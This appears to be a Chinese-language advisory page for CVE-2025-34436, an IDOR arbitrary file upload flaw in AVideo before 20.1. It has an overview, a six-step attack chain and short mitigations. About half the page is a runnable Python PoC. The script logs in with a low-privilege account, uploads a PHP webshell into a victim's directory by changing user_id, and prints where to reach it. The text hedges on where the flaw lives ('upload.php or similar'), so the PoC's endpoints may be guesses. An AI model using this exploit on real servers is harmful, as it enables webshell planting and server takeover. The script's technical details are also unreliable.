CVE-2025-34436 | AVideo身份认证绕过导致任意文件上传漏洞

漏洞信息

漏洞编号

CVE-2025-34436

漏洞类型

IDOR（不安全的直接对象引用）/ 任意文件上传

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

AVideo

漏洞概述

CVE-2025-34436是AVideo视频平台中的一个高危安全漏洞，CVSS评分达到8.8。该漏洞存在于AVideo 20.1之前的版本中，由于系统对文件上传功能的权限验证不完善，导致任何经过身份认证的低权限用户都可以向其他用户所属的目录中上传文件。漏洞的根本原因在于系统虽然验证了用户的身份（认证检查），但未强制执行所有权检查（授权检查），形成了不安全的直接对象引用（IDOR）问题。攻击者可以利用此漏洞绕过正常的文件访问控制机制，在目标用户的存储空间中植入任意文件，可能导致恶意代码执行、敏感数据泄露或进一步的内网横向移动。该漏洞影响范围广泛，所有使用AVideo 20.1之前版本的用户都面临潜在风险。

技术细节

AVideo是一个开源的视频分享平台，其文件上传功能存在严重的访问控制缺陷。在文件上传接口中，系统仅验证请求者是否已登录（authentication check），但未验证上传目标目录是否属于当前用户（authorization check）。具体来说，当用户请求上传文件时，系统接收目标目录ID作为参数，但服务端未校验该目录是否属于当前认证用户。攻击者可以通过拦截上传请求，修改目标目录ID为其他用户的目录路径，从而实现跨用户的文件写入。漏洞存在于upload.php或类似的文件上传处理模块中，攻击者只需拥有有效的低权限账户，即可利用此IDOR漏洞将恶意文件（如webshell、脚本文件）上传到任意用户目录。成功利用后，攻击者可通过访问受害者目录中的恶意文件来执行任意代码或进行进一步的攻击。

攻击链分析

STEP 1

步骤1

攻击者获取AVideo平台的低权限账户（任何有效账户即可）

STEP 2

步骤2

攻击者准备恶意文件（如webshell、PHP脚本等）

STEP 3

步骤3

攻击者拦截正常文件上传请求，修改user_id参数指向目标受害者的目录ID

STEP 4

步骤4

服务器仅验证攻击者已登录，未检查目标目录所有权，直接将恶意文件写入受害者目录

STEP 5

步骤5

攻击者通过Web访问路径访问上传的恶意文件，触发代码执行

STEP 6

步骤6

攻击者获得服务器执行权限，可进一步进行数据窃取、内网渗透等操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-34436 PoC - IDOR Arbitrary File Upload in AVideo
# Target: AVideo < 20.1

def exploit_avideo(target_url, username, password, target_user_id, malicious_file_path):
    """
    Exploit IDOR vulnerability to upload file to another user's directory
    
    Args:
        target_url: Base URL of AVideo installation
        username: Attacker account username
        password: Attacker account password
        target_user_id: Victim's user ID (directory owner)
        malicious_file_path: Path to file to upload
    """
    
    session = requests.Session()
    
    # Step 1: Login to get authenticated session
    login_url = f"{target_url}/login.json"
    login_data = {
        'user': username,
        'pass': password
    }
    
    try:
        login_response = session.post(login_url, data=login_data, timeout=10)
        if login_response.status_code != 200:
            print("[-] Login failed - Invalid credentials")
            return False
        print("[+] Successfully authenticated")
        
        # Step 2: Read malicious file content
        with open(malicious_file_path, 'rb') as f:
            file_content = f.read()
        
        # Step 3: Upload file to target user's directory (IDOR)
        upload_url = f"{target_url}/upload"
        
        # Key: Modify 'user_id' parameter to point to victim
        files = {
            'file': ('shell.php', file_content, 'application/x-php')
        }
        data = {
            'user_id': target_user_id,  # IDOR: Point to victim's directory
            'type': 'video'
        }
        
        upload_response = session.post(upload_url, files=files, data=data, timeout=30)
        
        if upload_response.status_code == 200:
            print(f"[+] File uploaded to user_id {target_user_id}'s directory")
            print(f"[+] Access file at: {target_url}/videos/user_{target_user_id}/shell.php")
            return True
        else:
            print("[-] Upload failed")
            return False
            
    except requests.exceptions.RequestException as e:
        print(f"[-] Connection error: {e}")
        return False

if __name__ == "__main__":
    if len(sys.argv) < 6:
        print("Usage: python cve-2025-34436.py <target_url> <username> <password> <target_user_id> <file_path>")
        print("Example: python cve-2025-34436.py http://target.com attacker pass123 5 shell.php")
        sys.exit(1)
    
    target = sys.argv[1]
    user = sys.argv[2]
    pwd = sys.argv[3]
    target_uid = sys.argv[4]
    file_path = sys.argv[5]
    
    exploit_avideo(target, user, pwd, target_uid, file_path)

影响范围

AVideo < 20.1

防御指南

临时缓解措施

如果无法立即升级，可采取以下临时措施：1) 限制文件上传功能仅对管理员开放；2) 启用Web应用防火墙（WAF）规则检测异常的user_id参数；3) 监控异常的文件上传行为和跨用户目录访问日志；4) 对上传目录设置严格的文件执行权限，禁用PHP等脚本在上传目录的执行。